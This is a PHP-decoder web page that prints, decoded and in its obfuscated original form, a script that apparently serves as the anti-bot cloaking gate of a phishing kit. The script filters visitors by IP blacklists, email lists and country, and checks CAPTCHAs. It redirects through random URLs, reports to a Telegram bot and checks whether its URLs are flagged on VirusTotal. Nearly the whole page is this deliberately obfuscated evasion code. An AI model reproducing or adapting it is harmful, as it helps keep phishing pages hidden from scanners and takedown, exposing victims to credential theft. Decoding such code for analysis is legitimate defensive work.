Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto AnO3FqrNHOfSH3; rmL_EIlp41oOCi: fBH7WWfSaVsZHL: goto AHlG9eAfxn2XDb; KZ17Zk7sqB9o7..
Decoded Output download
<? goto AnO3FqrNHOfSH3;
rmL_EIlp41oOCi: fBH7WWfSaVsZHL:
goto AHlG9eAfxn2XDb;
KZ17Zk7sqB9o7T: GUcgbRc1JIkIpH:
goto LNR1kGiCIv4VTq;
VJu9wTQphqdSkD:
$_SESSION["pass"] = "pass";
goto kd_K5ADC4obR7f;
IvkpMNW2vvcEYd: DQBhsyTUGZMD5R:
goto Rih0G3xxJvhA79;
WW3TUcarmqepjl:
$debugFile = "{$src}/debug.txt";
goto nJ0kwQcVffU1lC;
AnO3FqrNHOfSH3:
$denyFolder = "{$src}/deny";
goto iMi1a7VI6AHk4x;
dB2XstwfUm6reh:
if ($responseData && isset($responseData["success"]) && $responseData["success"] === true) {
goto OEpINae4wsma6m;
}
goto uTLf9JiTdeCLxd;
nJ0kwQcVffU1lC:
$urlsFile = "{$src}/urls.txt";
goto LP5A0oU4OhhKSl;
Lh5VtQqoYz65DG:
exit("Script works only with apache servers!");
goto IvkpMNW2vvcEYd;
CH7OJHq8Rz4skU:
$gcapData = array("secret" => $gCaptchaSecret, "response" => $_POST["g-recaptcha-response"]);
goto cTUlTH26JIHgM_;
lrE7RBG2gjBwux:
goto s6lyLoMVBx_4Ye;
goto pGcY0Tnw5_YrEQ;
SZsBsqfhVW0reF:
$_SESSION["failed"] = "failed";
goto i8lAeNLAFapZGO;
V7v0u2xQtEviIO:
$turnstileData = array("secret" => $turnstileSecret, "response" => $_POST["cf-turnstile-response"]);
goto ASOQF4o3PSIAte;
RBxXsVWC3WJUwi:
if ($responseData && isset($responseData["success"]) && $responseData["success"] === true) {
goto XA8EK_B9TDfUgT;
}
goto o5Xb3ZxNW3JdY7;
mv7qsMu5ENvHNi:
$_SESSION["pass"] = "pass";
goto rmL_EIlp41oOCi;
cTUlTH26JIHgM_:
$g_header = array("Content-Type: multipart/form-data");
goto YXK1yoa15_v8Kt;
xHgQWN08kFFyZT:
if (!(stripos($_SERVER["SERVER_SOFTWARE"], "apache") === false)) {
goto DQBhsyTUGZMD5R;
}
goto Lh5VtQqoYz65DG;
XZmyJilpVYOvtO:
$userAgent = $_SERVER["HTTP_USER_AGENT"];
goto GSTtbZ7RCpzPqq;
LP5A0oU4OhhKSl:
$timerfile = "{$src}/timer.txt";
goto rTyHDGVYGe5i0X;
efZqjOV37SEjZS:
$responseData = json_decode($verifyCaptcha, true);
goto O_28zr6oRDcUrd;
uLHdOe7jZZIjUE:
$responseData = json_decode($verifyCaptcha, true);
goto dB2XstwfUm6reh;
ZEDyTgEkAKevFY:
$verifyCaptcha = Mc10V_Smx7whPK("https://challenges.cloudflare.com/turnstile/v0/siteverify", $turnstileData, $p_header);
goto efZqjOV37SEjZS;
c7JAxbYopDZZjD: XA8EK_B9TDfUgT:
goto UUGpvanUOeZYgo;
UUGpvanUOeZYgo:
$_SESSION["pass"] = "pass";
goto KZ17Zk7sqB9o7T;
o5Xb3ZxNW3JdY7:
$_SESSION["failed"] = "failed";
goto GSAIRlLFvqjnr1;
z9_fJvH70zfb8g:
if (!($_SERVER["REQUEST_METHOD"] === "POST")) {
goto g9vKSy9gveB7NQ;
}
goto WJOjZBTQKcnWxP;
sR4I4r5aA0qLqW:
if (!isset($_POST[$accessKey])) {
goto rYGrr9PDEccOd2;
}
goto JD6w3jELwKEfYZ;
eme5XLe9Z2EAyv:
$h_header = array("Content-Type: multipart/form-data");
goto Q1sUno9Ihrxl3x;
LJWzyDFmaPfT9C:
KqLDvs55EK4weP($accessKey, $remoteIp, $blacklistFile, $withoutEmailBlock, $listEmail, $visitLog, $userAgent, $recordVisit, $blockIpv6, $gCaptchaKey, $turnstileKey, $chatId, $botToken, $visitToAllow, $denyFolder, $moonitoPublicKey, $moonitoSecretKey, $moonitoDomain, $antiBotPw_api, $mustLeakBot, $activationKey, $urlPrevent, $enableDebug, $blockSuspiciousIp, $debugToFile, $debugFile, $urlsFile, $failedUrl, $countryBlockList, $hCaptchaKey, $timeToCheck, $virusTotalApiKey, $virusTotalMalicious, $virusTotalSuspicious, $timerfile, $pressAndHoldCaptcha);
goto uy805VVlHWrx7B;
Kn_LXHEzEkdB3l:
if (!(isset($_POST["g-recaptcha-response"]) && $gCaptchaKey && $gCaptchaSecret)) {
goto PGGHqH6pWRQcig;
}
goto CH7OJHq8Rz4skU;
LyWiUuv0ldfi9w:
$visitLog = "{$src}/log.txt";
goto FzyzRbSCO6O_pj;
ZafS2UHVuemLBh: T37_6Twk4vO8jq:
goto mv7qsMu5ENvHNi;
FzyzRbSCO6O_pj:
$listEmail = "{$src}/email_list.txt";
goto WW3TUcarmqepjl;
GSTtbZ7RCpzPqq:
function KQldVS55eK4weP($accessKey, $remoteIp, $blacklistFile, $withoutEmailBlock, $listEmail, $visitLog, $userAgent, $recordVisit, $blockIpv6, $gCaptchaKey, $turnstileKey, $chatId, $botToken, $visitToAllow, $denyFolder, $moonitoPublicKey, $moonitoSecretKey, $moonitoDomain, $antiBotPw_api, $mustLeakBot, $activationKey, $urlPrevent, $enableDebug, $blockSuspiciousIp, $debugToFile, $debugFile, $urlsFile, $failedUrl, $countryBlockList, $hCaptchaKey, $timeToCheck, $virusTotalApiKey, $virusTotalMalicious, $virusTotalSuspicious, $timerfile, $pressAndHoldCaptcha)
{
goto FK20hdm2uXOLdS;
T_2xh96KHLOfID:
header("Location: " . $getRandomUrl . $getRequestUrl);
goto suBJMS0SgTH4EA;
IXZ0WbP_qPa80i:
UeK4mQdSIu1YED($remoteIp, $blacklistFile, $failedUrl);
goto bfHztbCRCYTxC5;
wUKP758_2Zs1h2: KvEil9A0ezL7YX:
goto YP8rvkw6CrDPvD;
hJM_ikISAc9Hcx:
exit;
goto MK6Liq0kAQMyV7;
L1j6jBKLZV9p9S:
FX2smiuA3f1etC($urlsFile, $virusTotalApiKey, $botToken, $chatId, $remoteIp, $debugToFile, $debugFile, $timeToCheck, $virusTotalMalicious, $virusTotalSuspicious, $timerfile);
goto KphhNVJvK61dmm;
dnlsQsC4BIwDhn:
echo "<script>location.reload();</script>";
goto ATVUnnq_JuArcU;
tecENWK1gHilYy:
unset($_SESSION["final"]);
goto L1j6jBKLZV9p9S;
jxSwLqldNUWvwf:
exit;
goto i6ehCOIOarp2lC;
DSSXqiaHyERbXC:
header("Location: " . $failedUrl);
goto jxSwLqldNUWvwf;
GFHLI44OU8Yfo5: wDTUMnfibPHOfd:
goto gLqDhXP_MENtZ9;
PJT9wj8c8orFg9: ba7acdp1SyngPj:
goto Q6sCCr2j9gLRu1;
MK6Liq0kAQMyV7: Zx2q4v996azgEa:
goto zTKaaLMHEsc7ZW;
suBJMS0SgTH4EA:
exit;
goto WHROn6vKFZ_CzB;
pZzD2Rd2eNFMkp:
$getRandomUrl = NNZGIyLhiCY809() . "/" . nNzGIyLHIcy809();
goto V5Djdeo3VMoVf2;
Qo_XmVhyj7GipT:
echo TrWnQ749UqDivS($genUlr, $accessKey);
goto InxcEptLRIxQGc;
DrBTafHw9gxTs_:
$getRandomUrl = NnZgiylhicY809() . "/" . NNzGiYlHICy809() . "?";
goto jdQYd32hRGDaWE;
KphhNVJvK61dmm:
exit;
goto wUKP758_2Zs1h2;
FK20hdm2uXOLdS:
$genUlr = nnzgIyLHICY809() . "/" . nNzgIYLHIcy809() . "/" . NNzgIYlHIcy809();
goto TD3513CsO_yHIu;
zTKaaLMHEsc7ZW:
if (!isset($_SESSION["step"])) {
goto wDTUMnfibPHOfd;
}
goto yT_RdNPIWljnSj;
yT_RdNPIWljnSj:
unset($_SESSION["step"]);
goto Qo_XmVhyj7GipT;
ghsgRXq7tocokF:
$getRequestUrl = $_SERVER["QUERY_STRING"];
goto wJEZJFMRQo9QKO;
InxcEptLRIxQGc:
exit;
goto GFHLI44OU8Yfo5;
PiGfMJ4_fbpCcY: FToUDurFMnD3I4:
goto pZzD2Rd2eNFMkp;
YP8rvkw6CrDPvD:
if (!isset($_SESSION["pass"])) {
goto ba7acdp1SyngPj;
}
goto ERMHAaPybiQv4f;
VVNyifDFlR3AD2:
unset($_SESSION["failed"]);
goto DSSXqiaHyERbXC;
u1tiXvWk6HmemW:
echo v1Flj6TcU53J31($gCaptchaKey, $turnstileKey, $hCaptchaKey, $pressAndHoldCaptcha, $title_string, nnZGIYLHiCY809(), NNzgIyLHIcY809());
goto hJM_ikISAc9Hcx;
E9A574Dmxd9swC:
$botResult = Yar22F0asnTA0m($remoteIp, $blacklistFile, $withoutEmailBlock, $listEmail, $visitLog, $userAgent, $recordVisit, $blockIpv6, $chatId, $botToken, $visitToAllow, $denyFolder, $moonitoPublicKey, $moonitoSecretKey, $moonitoDomain, $antiBotPw_api, $mustLeakBot, $activationKey, $urlPrevent, $enableDebug, $blockSuspiciousIp, $debugToFile, $debugFile, $countryBlockList);
goto nRKXTYmWwWNUNC;
Q6sCCr2j9gLRu1:
if (!isset($_SESSION["start"])) {
goto Zx2q4v996azgEa;
}
goto m4pqYeSKLJ6AWm;
m4pqYeSKLJ6AWm:
unset($_SESSION["start"]);
goto u1tiXvWk6HmemW;
V5Djdeo3VMoVf2: NzRIayxezTOlmV:
goto T_2xh96KHLOfID;
ATVUnnq_JuArcU:
exit;
goto PJT9wj8c8orFg9;
TD3513CsO_yHIu:
$title_string = nnzgIYLHicY809();
goto phwXu1uP4gxtut;
fhib0y_JR2eyI0:
$_SESSION["final"] = "final";
goto dnlsQsC4BIwDhn;
jdQYd32hRGDaWE:
goto NzRIayxezTOlmV;
goto PiGfMJ4_fbpCcY;
wJEZJFMRQo9QKO:
if (empty($getRequestUrl)) {
goto FToUDurFMnD3I4;
}
goto DrBTafHw9gxTs_;
gLqDhXP_MENtZ9:
$_SESSION["step"] = "step";
goto ghsgRXq7tocokF;
i6ehCOIOarp2lC: mJ8IgnnmvGRNqO:
goto nU1A4ndt3ETJhH;
nRKXTYmWwWNUNC:
if (!$botResult) {
goto BbFEUyXyav5OTc;
}
goto IXZ0WbP_qPa80i;
phwXu1uP4gxtut:
if (!isset($_SESSION["failed"])) {
goto mJ8IgnnmvGRNqO;
}
goto VVNyifDFlR3AD2;
bfHztbCRCYTxC5: BbFEUyXyav5OTc:
goto fhib0y_JR2eyI0;
nU1A4ndt3ETJhH:
if (!isset($_SESSION["final"])) {
goto KvEil9A0ezL7YX;
}
goto tecENWK1gHilYy;
ERMHAaPybiQv4f:
unset($_SESSION["pass"]);
goto E9A574Dmxd9swC;
WHROn6vKFZ_CzB:
}
goto E046I90ihp701O;
E046I90ihp701O:
if (!($_SERVER["REQUEST_METHOD"] === "GET")) {
goto uPqiUztN83vMaz;
}
goto LJWzyDFmaPfT9C;
Ah0246c8k7PevU: TTxTOEF1Q3a8jZ:
goto b3c0fQS7cLQCQF;
YXK1yoa15_v8Kt:
$verifyCaptcha = mC10v_Smx7Whpk("https://www.google.com/recaptcha/api/siteverify", $gcapData, $g_header);
goto evfNnQB3vlke84;
NO0DHauLAGm182: TlXK3QoG9m2PcP:
goto sR4I4r5aA0qLqW;
bSYL6RY3LfCVGo:
if (!(isset($_POST["h-captcha-response"]) && $hCaptchaKey && $hCaptchaSecret)) {
goto TTxTOEF1Q3a8jZ;
}
goto LD6bStVDRdwh3_;
O_28zr6oRDcUrd:
if ($responseData && isset($responseData["success"]) && $responseData["success"] === true) {
goto T37_6Twk4vO8jq;
}
goto SZsBsqfhVW0reF;
ASOQF4o3PSIAte:
$p_header = array("Content-Type: multipart/form-data");
goto ZEDyTgEkAKevFY;
pGcY0Tnw5_YrEQ: OEpINae4wsma6m:
goto VJu9wTQphqdSkD;
iMi1a7VI6AHk4x:
$blacklistFile = "{$src}/blacklistIps.txt";
goto SedHj9lAcZnBRi;
Rih0G3xxJvhA79:
$remoteIp = isset($_SERVER["HTTP_CF_CONNECTING_IP"]) ? $_SERVER["HTTP_CF_CONNECTING_IP"] : $_SERVER["REMOTE_ADDR"];
goto XZmyJilpVYOvtO;
WJOjZBTQKcnWxP:
if (!(isset($_POST["cf-turnstile-response"]) && $turnstileKey && $turnstileSecret)) {
goto lAfvYdYZyk7WHo;
}
goto V7v0u2xQtEviIO;
A8U8wUusFXb422:
require "func.php";
goto xHgQWN08kFFyZT;
evfNnQB3vlke84:
$responseData = json_decode($verifyCaptcha, true);
goto RBxXsVWC3WJUwi;
LNR1kGiCIv4VTq: PGGHqH6pWRQcig:
goto bSYL6RY3LfCVGo;
GSAIRlLFvqjnr1:
goto GUcgbRc1JIkIpH;
goto c7JAxbYopDZZjD;
LD6bStVDRdwh3_:
$hcapData = array("secret" => $hCaptchaSecret, "response" => $_POST["h-captcha-response"]);
goto eme5XLe9Z2EAyv;
i8lAeNLAFapZGO:
goto fBH7WWfSaVsZHL;
goto ZafS2UHVuemLBh;
uy805VVlHWrx7B: uPqiUztN83vMaz:
goto z9_fJvH70zfb8g;
SedHj9lAcZnBRi:
$listEmail = "{$src}/email_list.txt";
goto LyWiUuv0ldfi9w;
Q1sUno9Ihrxl3x:
$verifyCaptcha = mc10v_SMX7WhPK("https://hcaptcha.com/siteverify", $hcapData, $h_header);
goto uLHdOe7jZZIjUE;
rTyHDGVYGe5i0X:
session_start();
goto A8U8wUusFXb422;
YSwXFX_78q0QL1:
$_SESSION["pass"] = "pass";
goto NO0DHauLAGm182;
kd_K5ADC4obR7f: s6lyLoMVBx_4Ye:
goto Ah0246c8k7PevU;
uTLf9JiTdeCLxd:
$_SESSION["failed"] = "failed";
goto lrE7RBG2gjBwux;
b3c0fQS7cLQCQF:
if (!isset($_POST["captcha-box"])) {
goto TlXK3QoG9m2PcP;
}
goto YSwXFX_78q0QL1;
JD6w3jELwKEfYZ:
$_SESSION["start"] = "start";
goto jImMDUQJVRC3g1;
jImMDUQJVRC3g1: rYGrr9PDEccOd2:
goto X5zk7OE_YgQncL;
AHlG9eAfxn2XDb: lAfvYdYZyk7WHo:
goto Kn_LXHEzEkdB3l;
X5zk7OE_YgQncL: g9vKSy9gveB7NQ:
?>
Did this file decode correctly?
Original Code
goto AnO3FqrNHOfSH3;
rmL_EIlp41oOCi: fBH7WWfSaVsZHL:
goto AHlG9eAfxn2XDb;
KZ17Zk7sqB9o7T: GUcgbRc1JIkIpH:
goto LNR1kGiCIv4VTq;
VJu9wTQphqdSkD:
$_SESSION["\x70\141\163\x73"] = "\x70\x61\163\163";
goto kd_K5ADC4obR7f;
IvkpMNW2vvcEYd: DQBhsyTUGZMD5R:
goto Rih0G3xxJvhA79;
WW3TUcarmqepjl:
$debugFile = "{$src}\57\x64\x65\x62\x75\147\56\164\170\x74";
goto nJ0kwQcVffU1lC;
AnO3FqrNHOfSH3:
$denyFolder = "{$src}\x2f\x64\145\156\x79";
goto iMi1a7VI6AHk4x;
dB2XstwfUm6reh:
if ($responseData && isset($responseData["\163\165\143\x63\145\163\x73"]) && $responseData["\163\x75\143\143\145\x73\x73"] === true) {
goto OEpINae4wsma6m;
}
goto uTLf9JiTdeCLxd;
nJ0kwQcVffU1lC:
$urlsFile = "{$src}\x2f\165\x72\x6c\163\56\x74\x78\x74";
goto LP5A0oU4OhhKSl;
Lh5VtQqoYz65DG:
exit("\123\x63\162\151\160\164\40\167\157\x72\153\163\40\x6f\156\154\171\x20\x77\x69\x74\150\40\x61\160\x61\143\150\145\40\163\145\x72\x76\x65\x72\x73\41");
goto IvkpMNW2vvcEYd;
CH7OJHq8Rz4skU:
$gcapData = array("\x73\145\x63\x72\x65\x74" => $gCaptchaSecret, "\162\x65\163\x70\157\x6e\163\145" => $_POST["\147\55\162\x65\x63\141\x70\164\143\x68\x61\x2d\x72\145\163\160\x6f\x6e\x73\x65"]);
goto cTUlTH26JIHgM_;
lrE7RBG2gjBwux:
goto s6lyLoMVBx_4Ye;
goto pGcY0Tnw5_YrEQ;
SZsBsqfhVW0reF:
$_SESSION["\146\x61\151\x6c\145\x64"] = "\x66\x61\x69\154\145\144";
goto i8lAeNLAFapZGO;
V7v0u2xQtEviIO:
$turnstileData = array("\x73\x65\143\162\x65\x74" => $turnstileSecret, "\162\145\163\x70\x6f\156\x73\145" => $_POST["\x63\146\55\x74\165\x72\x6e\x73\164\151\154\x65\55\162\145\163\160\x6f\x6e\163\145"]);
goto ASOQF4o3PSIAte;
RBxXsVWC3WJUwi:
if ($responseData && isset($responseData["\163\x75\143\x63\x65\x73\163"]) && $responseData["\163\x75\143\143\145\163\x73"] === true) {
goto XA8EK_B9TDfUgT;
}
goto o5Xb3ZxNW3JdY7;
mv7qsMu5ENvHNi:
$_SESSION["\160\141\x73\x73"] = "\160\141\163\163";
goto rmL_EIlp41oOCi;
cTUlTH26JIHgM_:
$g_header = array("\x43\x6f\x6e\x74\145\156\164\x2d\x54\x79\x70\x65\72\40\x6d\165\154\164\x69\x70\x61\x72\x74\x2f\146\x6f\x72\x6d\55\144\141\x74\x61");
goto YXK1yoa15_v8Kt;
xHgQWN08kFFyZT:
if (!(stripos($_SERVER["\123\x45\x52\126\x45\122\137\x53\117\x46\124\x57\x41\122\x45"], "\x61\x70\141\x63\150\145") === false)) {
goto DQBhsyTUGZMD5R;
}
goto Lh5VtQqoYz65DG;
XZmyJilpVYOvtO:
$userAgent = $_SERVER["\x48\x54\x54\x50\x5f\125\x53\105\122\137\101\x47\x45\x4e\x54"];
goto GSTtbZ7RCpzPqq;
LP5A0oU4OhhKSl:
$timerfile = "{$src}\57\164\151\x6d\x65\x72\56\x74\170\x74";
goto rTyHDGVYGe5i0X;
efZqjOV37SEjZS:
$responseData = json_decode($verifyCaptcha, true);
goto O_28zr6oRDcUrd;
uLHdOe7jZZIjUE:
$responseData = json_decode($verifyCaptcha, true);
goto dB2XstwfUm6reh;
ZEDyTgEkAKevFY:
$verifyCaptcha = Mc10V_Smx7whPK("\150\164\x74\160\x73\x3a\x2f\57\x63\x68\141\x6c\154\x65\x6e\x67\x65\163\56\143\154\157\x75\x64\x66\154\141\x72\x65\56\143\157\155\x2f\164\165\x72\x6e\x73\x74\151\x6c\145\57\166\60\57\x73\x69\164\x65\166\145\162\151\146\x79", $turnstileData, $p_header);
goto efZqjOV37SEjZS;
c7JAxbYopDZZjD: XA8EK_B9TDfUgT:
goto UUGpvanUOeZYgo;
UUGpvanUOeZYgo:
$_SESSION["\160\x61\x73\163"] = "\160\141\x73\x73";
goto KZ17Zk7sqB9o7T;
o5Xb3ZxNW3JdY7:
$_SESSION["\146\x61\x69\154\145\144"] = "\x66\141\x69\154\145\144";
goto GSAIRlLFvqjnr1;
z9_fJvH70zfb8g:
if (!($_SERVER["\x52\105\121\x55\x45\123\x54\137\x4d\105\x54\x48\117\x44"] === "\120\x4f\x53\124")) {
goto g9vKSy9gveB7NQ;
}
goto WJOjZBTQKcnWxP;
sR4I4r5aA0qLqW:
if (!isset($_POST[$accessKey])) {
goto rYGrr9PDEccOd2;
}
goto JD6w3jELwKEfYZ;
eme5XLe9Z2EAyv:
$h_header = array("\x43\157\x6e\x74\x65\156\x74\55\124\x79\x70\145\x3a\40\155\165\x6c\x74\x69\160\x61\x72\164\57\x66\157\162\x6d\55\144\141\x74\141");
goto Q1sUno9Ihrxl3x;
LJWzyDFmaPfT9C:
KqLDvs55EK4weP($accessKey, $remoteIp, $blacklistFile, $withoutEmailBlock, $listEmail, $visitLog, $userAgent, $recordVisit, $blockIpv6, $gCaptchaKey, $turnstileKey, $chatId, $botToken, $visitToAllow, $denyFolder, $moonitoPublicKey, $moonitoSecretKey, $moonitoDomain, $antiBotPw_api, $mustLeakBot, $activationKey, $urlPrevent, $enableDebug, $blockSuspiciousIp, $debugToFile, $debugFile, $urlsFile, $failedUrl, $countryBlockList, $hCaptchaKey, $timeToCheck, $virusTotalApiKey, $virusTotalMalicious, $virusTotalSuspicious, $timerfile, $pressAndHoldCaptcha);
goto uy805VVlHWrx7B;
Kn_LXHEzEkdB3l:
if (!(isset($_POST["\147\55\162\x65\143\141\160\164\143\150\141\55\162\145\x73\160\157\x6e\x73\x65"]) && $gCaptchaKey && $gCaptchaSecret)) {
goto PGGHqH6pWRQcig;
}
goto CH7OJHq8Rz4skU;
LyWiUuv0ldfi9w:
$visitLog = "{$src}\57\x6c\x6f\147\x2e\164\170\x74";
goto FzyzRbSCO6O_pj;
ZafS2UHVuemLBh: T37_6Twk4vO8jq:
goto mv7qsMu5ENvHNi;
FzyzRbSCO6O_pj:
$listEmail = "{$src}\x2f\145\x6d\141\151\154\137\x6c\x69\163\x74\x2e\x74\x78\164";
goto WW3TUcarmqepjl;
GSTtbZ7RCpzPqq:
function KQldVS55eK4weP($accessKey, $remoteIp, $blacklistFile, $withoutEmailBlock, $listEmail, $visitLog, $userAgent, $recordVisit, $blockIpv6, $gCaptchaKey, $turnstileKey, $chatId, $botToken, $visitToAllow, $denyFolder, $moonitoPublicKey, $moonitoSecretKey, $moonitoDomain, $antiBotPw_api, $mustLeakBot, $activationKey, $urlPrevent, $enableDebug, $blockSuspiciousIp, $debugToFile, $debugFile, $urlsFile, $failedUrl, $countryBlockList, $hCaptchaKey, $timeToCheck, $virusTotalApiKey, $virusTotalMalicious, $virusTotalSuspicious, $timerfile, $pressAndHoldCaptcha)
{
goto FK20hdm2uXOLdS;
T_2xh96KHLOfID:
header("\114\157\x63\x61\164\151\157\x6e\72\x20" . $getRandomUrl . $getRequestUrl);
goto suBJMS0SgTH4EA;
IXZ0WbP_qPa80i:
UeK4mQdSIu1YED($remoteIp, $blacklistFile, $failedUrl);
goto bfHztbCRCYTxC5;
wUKP758_2Zs1h2: KvEil9A0ezL7YX:
goto YP8rvkw6CrDPvD;
hJM_ikISAc9Hcx:
exit;
goto MK6Liq0kAQMyV7;
L1j6jBKLZV9p9S:
FX2smiuA3f1etC($urlsFile, $virusTotalApiKey, $botToken, $chatId, $remoteIp, $debugToFile, $debugFile, $timeToCheck, $virusTotalMalicious, $virusTotalSuspicious, $timerfile);
goto KphhNVJvK61dmm;
dnlsQsC4BIwDhn:
echo "\74\163\x63\162\151\x70\164\76\154\157\x63\141\x74\151\157\156\56\x72\145\x6c\x6f\x61\x64\x28\x29\x3b\x3c\57\x73\143\x72\x69\160\x74\x3e";
goto ATVUnnq_JuArcU;
tecENWK1gHilYy:
unset($_SESSION["\146\151\156\x61\x6c"]);
goto L1j6jBKLZV9p9S;
jxSwLqldNUWvwf:
exit;
goto i6ehCOIOarp2lC;
DSSXqiaHyERbXC:
header("\x4c\x6f\143\x61\x74\151\157\x6e\72\40" . $failedUrl);
goto jxSwLqldNUWvwf;
GFHLI44OU8Yfo5: wDTUMnfibPHOfd:
goto gLqDhXP_MENtZ9;
PJT9wj8c8orFg9: ba7acdp1SyngPj:
goto Q6sCCr2j9gLRu1;
MK6Liq0kAQMyV7: Zx2q4v996azgEa:
goto zTKaaLMHEsc7ZW;
suBJMS0SgTH4EA:
exit;
goto WHROn6vKFZ_CzB;
pZzD2Rd2eNFMkp:
$getRandomUrl = NNZGIyLhiCY809() . "\x2f" . nNzGIyLHIcy809();
goto V5Djdeo3VMoVf2;
Qo_XmVhyj7GipT:
echo TrWnQ749UqDivS($genUlr, $accessKey);
goto InxcEptLRIxQGc;
DrBTafHw9gxTs_:
$getRandomUrl = NnZgiylhicY809() . "\57" . NNzGiYlHICy809() . "\77";
goto jdQYd32hRGDaWE;
KphhNVJvK61dmm:
exit;
goto wUKP758_2Zs1h2;
FK20hdm2uXOLdS:
$genUlr = nnzgIyLHICY809() . "\57" . nNzgIYLHIcy809() . "\x2f" . NNzgIYlHIcy809();
goto TD3513CsO_yHIu;
zTKaaLMHEsc7ZW:
if (!isset($_SESSION["\x73\164\145\160"])) {
goto wDTUMnfibPHOfd;
}
goto yT_RdNPIWljnSj;
yT_RdNPIWljnSj:
unset($_SESSION["\x73\x74\145\160"]);
goto Qo_XmVhyj7GipT;
ghsgRXq7tocokF:
$getRequestUrl = $_SERVER["\x51\x55\105\122\x59\137\123\x54\x52\x49\116\107"];
goto wJEZJFMRQo9QKO;
InxcEptLRIxQGc:
exit;
goto GFHLI44OU8Yfo5;
PiGfMJ4_fbpCcY: FToUDurFMnD3I4:
goto pZzD2Rd2eNFMkp;
YP8rvkw6CrDPvD:
if (!isset($_SESSION["\x70\141\163\x73"])) {
goto ba7acdp1SyngPj;
}
goto ERMHAaPybiQv4f;
VVNyifDFlR3AD2:
unset($_SESSION["\146\x61\151\154\x65\x64"]);
goto DSSXqiaHyERbXC;
u1tiXvWk6HmemW:
echo v1Flj6TcU53J31($gCaptchaKey, $turnstileKey, $hCaptchaKey, $pressAndHoldCaptcha, $title_string, nnZGIYLHiCY809(), NNzgIyLHIcY809());
goto hJM_ikISAc9Hcx;
E9A574Dmxd9swC:
$botResult = Yar22F0asnTA0m($remoteIp, $blacklistFile, $withoutEmailBlock, $listEmail, $visitLog, $userAgent, $recordVisit, $blockIpv6, $chatId, $botToken, $visitToAllow, $denyFolder, $moonitoPublicKey, $moonitoSecretKey, $moonitoDomain, $antiBotPw_api, $mustLeakBot, $activationKey, $urlPrevent, $enableDebug, $blockSuspiciousIp, $debugToFile, $debugFile, $countryBlockList);
goto nRKXTYmWwWNUNC;
Q6sCCr2j9gLRu1:
if (!isset($_SESSION["\163\x74\x61\162\x74"])) {
goto Zx2q4v996azgEa;
}
goto m4pqYeSKLJ6AWm;
m4pqYeSKLJ6AWm:
unset($_SESSION["\x73\164\x61\x72\164"]);
goto u1tiXvWk6HmemW;
V5Djdeo3VMoVf2: NzRIayxezTOlmV:
goto T_2xh96KHLOfID;
ATVUnnq_JuArcU:
exit;
goto PJT9wj8c8orFg9;
TD3513CsO_yHIu:
$title_string = nnzgIYLHicY809();
goto phwXu1uP4gxtut;
fhib0y_JR2eyI0:
$_SESSION["\146\151\156\141\154"] = "\x66\151\156\x61\154";
goto dnlsQsC4BIwDhn;
jdQYd32hRGDaWE:
goto NzRIayxezTOlmV;
goto PiGfMJ4_fbpCcY;
wJEZJFMRQo9QKO:
if (empty($getRequestUrl)) {
goto FToUDurFMnD3I4;
}
goto DrBTafHw9gxTs_;
gLqDhXP_MENtZ9:
$_SESSION["\x73\164\145\x70"] = "\x73\164\x65\x70";
goto ghsgRXq7tocokF;
i6ehCOIOarp2lC: mJ8IgnnmvGRNqO:
goto nU1A4ndt3ETJhH;
nRKXTYmWwWNUNC:
if (!$botResult) {
goto BbFEUyXyav5OTc;
}
goto IXZ0WbP_qPa80i;
phwXu1uP4gxtut:
if (!isset($_SESSION["\146\141\x69\x6c\x65\x64"])) {
goto mJ8IgnnmvGRNqO;
}
goto VVNyifDFlR3AD2;
bfHztbCRCYTxC5: BbFEUyXyav5OTc:
goto fhib0y_JR2eyI0;
nU1A4ndt3ETJhH:
if (!isset($_SESSION["\146\x69\156\141\154"])) {
goto KvEil9A0ezL7YX;
}
goto tecENWK1gHilYy;
ERMHAaPybiQv4f:
unset($_SESSION["\160\x61\x73\x73"]);
goto E9A574Dmxd9swC;
WHROn6vKFZ_CzB:
}
goto E046I90ihp701O;
E046I90ihp701O:
if (!($_SERVER["\x52\105\x51\x55\x45\x53\124\137\115\105\124\110\117\x44"] === "\x47\105\124")) {
goto uPqiUztN83vMaz;
}
goto LJWzyDFmaPfT9C;
Ah0246c8k7PevU: TTxTOEF1Q3a8jZ:
goto b3c0fQS7cLQCQF;
YXK1yoa15_v8Kt:
$verifyCaptcha = mC10v_Smx7Whpk("\150\164\x74\x70\x73\72\x2f\57\x77\x77\167\56\147\157\x6f\x67\x6c\x65\x2e\x63\157\x6d\x2f\162\145\143\x61\x70\164\143\150\x61\x2f\x61\x70\x69\57\x73\x69\x74\145\166\x65\x72\151\x66\171", $gcapData, $g_header);
goto evfNnQB3vlke84;
NO0DHauLAGm182: TlXK3QoG9m2PcP:
goto sR4I4r5aA0qLqW;
bSYL6RY3LfCVGo:
if (!(isset($_POST["\150\55\143\141\x70\x74\143\x68\x61\55\x72\x65\x73\160\x6f\x6e\163\x65"]) && $hCaptchaKey && $hCaptchaSecret)) {
goto TTxTOEF1Q3a8jZ;
}
goto LD6bStVDRdwh3_;
O_28zr6oRDcUrd:
if ($responseData && isset($responseData["\x73\165\143\143\x65\x73\163"]) && $responseData["\163\165\x63\x63\x65\x73\x73"] === true) {
goto T37_6Twk4vO8jq;
}
goto SZsBsqfhVW0reF;
ASOQF4o3PSIAte:
$p_header = array("\x43\x6f\x6e\164\145\x6e\x74\x2d\x54\x79\160\145\72\x20\x6d\165\154\x74\x69\x70\141\162\x74\57\x66\157\162\x6d\x2d\144\x61\x74\141");
goto ZEDyTgEkAKevFY;
pGcY0Tnw5_YrEQ: OEpINae4wsma6m:
goto VJu9wTQphqdSkD;
iMi1a7VI6AHk4x:
$blacklistFile = "{$src}\57\x62\x6c\x61\x63\x6b\154\151\163\x74\x49\x70\163\x2e\x74\170\x74";
goto SedHj9lAcZnBRi;
Rih0G3xxJvhA79:
$remoteIp = isset($_SERVER["\x48\124\124\120\137\103\x46\x5f\103\x4f\116\x4e\105\103\124\x49\x4e\107\137\111\120"]) ? $_SERVER["\110\x54\124\120\x5f\x43\106\x5f\x43\117\x4e\x4e\x45\x43\x54\111\116\x47\x5f\x49\120"] : $_SERVER["\x52\105\115\117\124\x45\137\101\104\104\122"];
goto XZmyJilpVYOvtO;
WJOjZBTQKcnWxP:
if (!(isset($_POST["\143\x66\x2d\x74\x75\x72\156\163\x74\x69\x6c\x65\55\162\145\x73\160\x6f\x6e\x73\x65"]) && $turnstileKey && $turnstileSecret)) {
goto lAfvYdYZyk7WHo;
}
goto V7v0u2xQtEviIO;
A8U8wUusFXb422:
